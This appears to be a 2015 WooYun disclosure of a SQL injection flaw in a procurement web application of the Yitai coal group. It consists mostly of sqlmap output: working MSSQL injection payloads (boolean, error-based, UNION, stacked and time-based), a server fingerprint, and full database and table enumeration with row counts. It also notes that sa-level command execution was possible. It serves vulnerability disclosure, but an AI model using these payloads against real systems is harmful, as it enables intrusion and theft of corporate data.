当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139969

漏洞标题:五大煤炭企业集团之一伊泰集团漏洞(失败的内网漫游篇)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-09-11 16:36

修复时间:2015-10-26 16:16

公开时间:2015-10-26 16:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-11: 细节已通知厂商并且等待厂商处理中
2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

内蒙古伊泰集团有限公司是以煤炭生产、经营为主业,以铁路运输、煤制油为产业延伸,以房地产开发等非煤产业为互补的大型现代化能源企业。公司连续十年跻身中国企业500强,2014年位列第317位,同时,位列中国煤炭企业百强第21位、内蒙古煤炭企业50强之首。
  目前,公司总资产超过千亿元,职工7600余人,下属内蒙古伊泰煤炭股份有限公司、内蒙古伊泰准东铁路有限责任公司、内蒙古伊泰呼准铁路有限公司、内蒙古伊泰煤制油有限责任公司、中科合成油技术有限公司、内蒙古伊泰置业有限责任公司等50家直接和间接控股公司,其中内蒙古伊泰煤炭股份有限公司为煤炭行业首家B+H股上市公司。

详细说明:

注入点:http://**.**.**.**/notesReport/ViewInformation.aspx?key=865
内网 站库分离 

sqlmap identified the following injection points with a total of 39 HTTP(s) requests:
---
Place: GET
Parameter: key
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: key=865 AND 1437=1437
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: key=865 AND 5939=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5939=5939) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113)))
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: key=865 UNION ALL SELECT NULL,CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(110)+CHAR(84)+CHAR(89)+CHAR(69)+CHAR(80)+CHAR(82)+CHAR(70)+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: key=865; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: key=865 WAITFOR DELAY '0:0:5'--
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: key=(SELECT CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4223=4223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [16]:
[*] DynamicsAx
[*] ECDev
[*] ECPecupm
[*] ECSupplierDataBase
[*] master
[*] model
[*] msdb
[*] ReportServer$SRM
[*] ReportServer$SRMTempDB
[*] SqlPersistenceService
[*] tempdb
[*] Tracking
[*] uupm
[*] wf
[*] Workflow
[*] YTDB
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: key
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: key=865 AND 1437=1437
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: key=865 AND 5939=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5939=5939) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113)))
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: key=865 UNION ALL SELECT NULL,CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(110)+CHAR(84)+CHAR(89)+CHAR(69)+CHAR(80)+CHAR(82)+CHAR(70)+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: key=865; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: key=865 WAITFOR DELAY '0:0:5'--
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: key=(SELECT CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4223=4223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
current database:    'ECDev'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: key
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: key=865 AND 1437=1437
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: key=865 AND 5939=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5939=5939) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113)))
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: key=865 UNION ALL SELECT NULL,CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(110)+CHAR(84)+CHAR(89)+CHAR(69)+CHAR(80)+CHAR(82)+CHAR(70)+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: key=865; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: key=865 WAITFOR DELAY '0:0:5'--
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: key=(SELECT CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4223=4223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: ECDev
[148 tables]
+-------------------------------------------------+
| BaseScoreWeight                                 |
| CompetitionScoreTable_M3                        |
| CompetitionScoreTable_M3                        |
| CompetitionScoreTable_M4                        |
| CompetitionScoreTable_P1P3                      |
| D99_CMD                                         |
| D99_REG                                         |
| D99_Tmp                                         |
| DTMP                                            |
| EC_InformationTitel                             |
| EC_NotesReport                                  |
| EC_TAuditAtta                                   |
| EC_TBusinessLog                                 |
| EC_TContractTableExtend                         |
| EC_TContractUploadFile                          |
| EC_TEvaluationReportExtend                      |
| EC_TInquiryBookExtend                           |
| EC_TOrderLetterUploadFile                       |
| EC_TPicketageAtta                               |
| EC_TPurchPlanTableExtend                        |
| EC_TPurchReqIniTableExtend                      |
| EC_TSuppInfoToProdClassChangeOrderAudit1        |
| EC_TTEMP_TEST1                                  |
| EC_TTenderLockLog                               |
| EC_TTenderQuestionDetailAttachment              |
| EC_TTenderQuestionDetailAttachment              |
| EC_TTenderQuestionTitle                         |
| EC_TTenderSuppApply                             |
| EC_tMail                                        |
| EC_tMailType                                    |
| EC_tParameters____delete                        |
| EC_tPriceMarket_20130426                        |
| EC_tPriceMarket_20130426                        |
| EC_tPricePurchase                               |
| EC_tPriceRegion                                 |
| EC_tPriceSource                                 |
| EC_tSuppProdCatalog                             |
| Ec_NoteAttach                                   |
| Ec_SuppInfo_View                                |
| Ec_SuppProdCatalog_View                         |
| Ec_TTenderDepute                                |
| Ec_rDegree                                      |
| Ec_tBusinessContactAttachment                   |
| Ec_tBusinessTypeForSuppSorce                    |
| Ec_tBusinessTypeForSuppSorce                    |
| Ec_tCompanyFinancerInfo                         |
| Ec_tExpertProfession                            |
| Ec_tExpertProfession                            |
| Ec_tFactoryBusinessType                         |
| Ec_tFrameworkAgreement                          |
| Ec_tFrameworkAgreementUploadFile                |
| Ec_tLog                                         |
| Ec_tPortalUserInfo_Bak                          |
| Ec_tPortalUserInfo_Bak                          |
| Ec_tProfession                                  |
| Ec_tToDoList                                    |
| FactoryInventory                                |
| ImgUpload                                       |
| Interface_Log                                   |
| JudgeWeightTable_M3                             |
| JudgeWeightTable_M3                             |
| JudgeWeightTable_M4                             |
| JudgeWeightTable_P1P3                           |
| Pcitc_UserInfo_View                             |
| PurchReqApproveOfLIYUEFENG_view                 |
| SendMsgLog                                      |
| Sheet1$                                         |
| Sheet2$                                         |
| TPC_TABLE                                       |
| Table_1                                         |
| TempInventoryForBalance                         |
| View_BiddingPrice                               |
| View_ContractAndOrderLetterBusinessIDPurchMajor |
| View_ContractAndOrderLetterDetailNew            |
| View_ContractAndOrderLetterDetailNew            |
| View_ContractAndOrderLetterDetailOldApply       |
| View_ContractAndOrderLetterListNew              |
| View_ContractAndOrderLetterListNew              |
| View_Ec_tProdPurType                            |
| View_SupplyForBidding                           |
| YT_tCheckSeq                                    |
| Yt_ReportAttachment                             |
| Yt_tPayType                                     |
| Yt_tPurchaseAddress                             |
| Yt_tSeqConsignmentClosingApplyMain              |
| Yt_tSeqForCheckApply                            |
| Yt_tSeqForCheckApply                            |
| Yt_tSeqForCheckAssign                           |
| Yt_tSeqForCheckNotice                           |
| Yt_tSeqForCheckProcess                          |
| Yt_tSeqForCheckReport                           |
| Yt_tSeqForCheckSpotCheck                        |
| Yt_tSeqForDeliveryCheckApply                    |
| Yt_tSeqForExchangeGoods                         |
| Yt_tSeqForFundPlan                              |
| Yt_tSeqForOverDueProcessM                       |
| Yt_tSeqForReceiveGoods                          |
| Yt_tSeqForReducePrice                           |
| Yt_tSeqForRejectGoods                           |
| Yt_tSeqForRepeatCheck                           |
| Yt_tSeqForSupplyApplyMain                       |
| Yt_tSeqForTransCheckApply                       |
| Yt_tSeqForTransCheckReport                      |
| Yt_tSeqForTrialInfo                             |
| Yt_tSeqPayOrder                                 |
| 不含6$                                              |
| 伊泰准东铁路员工竞聘统计报表$                                               |
| 办公用品年计划$                                               |
| 工单描述$                                               |
| 总表$                                               |
| 成本中心$                                               |
| 承包商$                                               |
| 数据更改$                                               |
| 物料价格$                                               |
| 物料分类$                                               |
| 物料类别$                                               |
| 申请延期协议$                                               |
| 设备中心用途表$                                               |
| 设备号描述$                                               |
| 设备用途$                                               |
| 车辆年计划$                                               |
| 银行old$                                            |
| 银行信息$                                               |
| 销售价$                                               |
| abc                                             |
| comd_list                                       |
| contracttest                                    |
| ec_tinquirybook_2012_8_2                        |
| evaluationreport_2012_8_8_back                  |
| jiaozhu                                         |
| pangolin_test_table                             |
| pbcatcol                                        |
| pbcatedt                                        |
| pbcatfmt                                        |
| pbcattbl                                        |
| pbcatvld                                        |
| profiler_out_table                              |
| sqlmapoutput                                    |
| sysdiagrams                                     |
| tBulletin                                       |
| tBulletinType                                   |
| t_jiaozhu                                       |
| tempevaluationreport                            |
| tempprod                                        |
| tempusertable                                   |
| user_temp_backup                                |
| view_CheckSginInfo                              |
| 税率替换                                            |
+-------------------------------------------------+
Database: ECDev
+-----------------------------------------------------+---------+
| Table                                               | Entries |
+-----------------------------------------------------+---------+
| dbo.Ec_tLog                                         | 813803  |
| dbo.EC_tSuppProdCatalog                             | 796897  |
| dbo.SendMsgLog                                      | 395460  |
| dbo.TempInventoryForBalance                         | 332729  |
| dbo.Ec_SuppProdCatalog_View                         | 231560  |
| dbo.View_ContractAndOrderLetterDetailNew            | 158158  |
| dbo.View_ContractAndOrderLetterDetailNew            | 158158  |
| dbo.[银行old$]                                          | 129495  |
| dbo.[银行信息$]                                             | 129493  |
| dbo.view_CheckSginInfo                              | 116966  |
| dbo.View_ContractAndOrderLetterDetailOldApply       | 111184  |
| dbo.[不含6$]                                            | 88221   |
| dbo.View_Ec_tProdPurType                            | 75898   |
| dbo.EC_tPricePurchase                               | 57893   |
| dbo.tempprod                                        | 52850   |
| dbo.View_ContractAndOrderLetterBusinessIDPurchMajor | 51250   |
| dbo.View_ContractAndOrderLetterListNew              | 37513   |
| dbo.View_ContractAndOrderLetterListNew              | 37513   |
| dbo.CompetitionScoreTable_P1P3                      | 35499   |
| dbo.Ec_tPortalUserInfo_Bak                          | 34141   |
| dbo.Ec_tPortalUserInfo_Bak                          | 34141   |
| dbo.[设备号描述$]                                             | 32726   |
| dbo.[物料价格$]                                             | 25008   |
| dbo.[销售价$]                                             | 24537   |
| dbo.Pcitc_UserInfo_View                             | 23960   |
| dbo.EC_TContractTableExtend                         | 17108   |
| dbo.[申请延期协议$]                                             | 17040   |
| dbo.profiler_out_table                              | 10744   |
| dbo.[物料类别$]                                             | 4573    |
| dbo.[物料分类$]                                             | 4173    |
| dbo.DTMP                                            | 3523    |
| dbo.EC_TInquiryBookExtend                           | 3493    |
| dbo.TPC_TABLE                                       | 3323    |
| dbo.Ec_SuppInfo_View                                | 3206    |
| dbo.contracttest                                    | 3096    |
| dbo.CompetitionScoreTable_M3                        | 2626    |
| dbo.CompetitionScoreTable_M3                        | 2626    |
| dbo.Ec_tExpertProfession                            | 2226    |
| dbo.Ec_tExpertProfession                            | 2226    |
| dbo.[设备用途$]                                             | 1757    |
| dbo.EC_TTenderQuestionTitle                         | 1698    |
| dbo.[设备中心用途表$]                                             | 1693    |
| dbo.EC_TSuppInfoToProdClassChangeOrderAudit1        | 1680    |
| dbo.EC_TContractUploadFile                          | 1614    |
| dbo.Ec_tFrameworkAgreement                          | 1409    |
| dbo.[伊泰准东铁路员工竞聘统计报表$]                                             | 1236    |
| dbo.EC_TTenderQuestionDetailAttachment              | 1026    |
| dbo.EC_TTenderQuestionDetailAttachment              | 1026    |
| dbo.EC_tPriceMarket_20130426                        | 1021    |
| dbo.EC_tPriceMarket_20130426                        | 1021    |
| dbo.abc                                             | 818     |
| dbo.EC_NotesReport                                  | 731     |
| dbo.user_temp_backup                                | 584     |
| dbo.CompetitionScoreTable_M4                        | 559     |
| dbo.tempusertable                                   | 504     |
| dbo.[成本中心$]                                             | 496     |
| dbo.tempevaluationreport                            | 489     |
| dbo.ec_tinquirybook_2012_8_2                        | 368     |
| dbo.[办公用品年计划$]                                             | 361     |
| dbo.View_BiddingPrice                               | 349     |
| dbo.evaluationreport_2012_8_8_back                  | 347     |
| dbo.Ec_TTenderDepute                                | 274     |
| dbo.Ec_tFactoryBusinessType                         | 270     |
| dbo.EC_TEvaluationReportExtend                      | 267     |
| dbo.EC_TTenderLockLog                               | 245     |
| dbo.EC_TPurchPlanTableExtend                        | 227     |
| dbo.Sheet2$                                         | 175     |
| dbo.Ec_NoteAttach                                   | 160     |
| dbo.[承包商$]                                             | 147     |
| dbo.EC_TPurchReqIniTableExtend                      | 144     |
| dbo.View_SupplyForBidding                           | 126     |
| dbo.EC_TAuditAtta                                   | 118     |
| dbo.Ec_tBusinessContactAttachment                   | 87      |
| dbo.Ec_tToDoList                                    | 75      |
| dbo.PurchReqApproveOfLIYUEFENG_view                 | 68      |
| dbo.JudgeWeightTable_M3                             | 59      |
| dbo.JudgeWeightTable_M3                             | 59      |
| dbo.Sheet1$                                         | 50      |
| dbo.[工单描述$]                                             | 45      |
| dbo.FactoryInventory                                | 42      |
| dbo.EC_TOrderLetterUploadFile                       | 41      |
| dbo.JudgeWeightTable_P1P3                           | 40      |
| dbo.Ec_tCompanyFinancerInfo                         | 32      |
| dbo.EC_tMail                                        | 26      |
| dbo.Yt_tSeqPayOrder                                 | 24      |
| dbo.pangolin_test_table                             | 23      |
| dbo.Yt_tPayType                                     | 23      |
| dbo.[数据更改$]                                             | 21      |
| dbo.pbcatedt                                        | 21      |
| dbo.pbcatfmt                                        | 20      |
| dbo.[车辆年计划$]                                             | 18      |
| dbo.Yt_tSeqForFundPlan                              | 15      |
| dbo.JudgeWeightTable_M4                             | 13      |
| dbo.Yt_tSeqForCheckReport                           | 13      |
| dbo.BaseScoreWeight                                 | 11      |
| dbo.D99_Tmp                                         | 10      |
| dbo.Ec_rDegree                                      | 10      |
| dbo.Ec_tBusinessTypeForSuppSorce                    | 10      |
| dbo.Ec_tBusinessTypeForSuppSorce                    | 10      |
| dbo.YT_tCheckSeq                                    | 8       |
| dbo.D99_CMD                                         | 7       |
| dbo.jiaozhu                                         | 7       |
| dbo.Yt_tPurchaseAddress                             | 6       |
| dbo.Yt_tSeqForSupplyApplyMain                       | 6       |
| dbo.ImgUpload                                       | 5       |
| dbo.Yt_tSeqForOverDueProcessM                       | 5       |
| dbo.Ec_tProfession                                  | 4       |
| dbo.Yt_tSeqForCheckProcess                          | 4       |
| dbo.EC_InformationTitel                             | 3       |
| dbo.Ec_tFrameworkAgreementUploadFile                | 3       |
| dbo.EC_tMailType                                    | 3       |
| dbo.tBulletin                                       | 3       |
| dbo.tBulletinType                                   | 3       |
| dbo.Yt_tSeqForCheckAssign                           | 3       |
| dbo.EC_TBusinessLog                                 | 2       |
| dbo.EC_tPriceRegion                                 | 2       |
| dbo.EC_tPriceSource                                 | 2       |
| dbo.Yt_tSeqForCheckApply                            | 2       |
| dbo.Yt_tSeqForCheckApply                            | 2       |
| dbo.Yt_tSeqForCheckSpotCheck                        | 2       |
| dbo.Yt_tSeqForReceiveGoods                          | 2       |
| dbo.Yt_tSeqForReducePrice                           | 2       |
| dbo.税率替换                                                | 2       |
| dbo.[总表$]                                             | 1       |
| dbo.D99_REG                                         | 1       |
| dbo.EC_tParameters____delete                        | 1       |
| dbo.Yt_tSeqConsignmentClosingApplyMain              | 1       |
| dbo.Yt_tSeqForDeliveryCheckApply                    | 1       |
| dbo.Yt_tSeqForExchangeGoods                         | 1       |
| dbo.Yt_tSeqForRejectGoods                           | 1       |
| dbo.Yt_tSeqForRepeatCheck                           | 1       |
| dbo.Yt_tSeqForTransCheckApply                       | 1       |
| dbo.Yt_tSeqForTransCheckReport                      | 1       |
+-----------------------------------------------------+---------+


到了这里 sa权限 各种能执行
数据库是 50的ip 但是网站是51的ip

11.png

12.png


由于站库分离 不知道路径啥的 写不了shell 也直接提权不了 所以就结束吧
但是数据库还是能全部脱的

漏洞证明:

已证明

修复方案:

过滤好参数

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-09-11 16:15

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发内蒙古分中心,由其后续协调网站管理单位处置。

最新状态:

暂无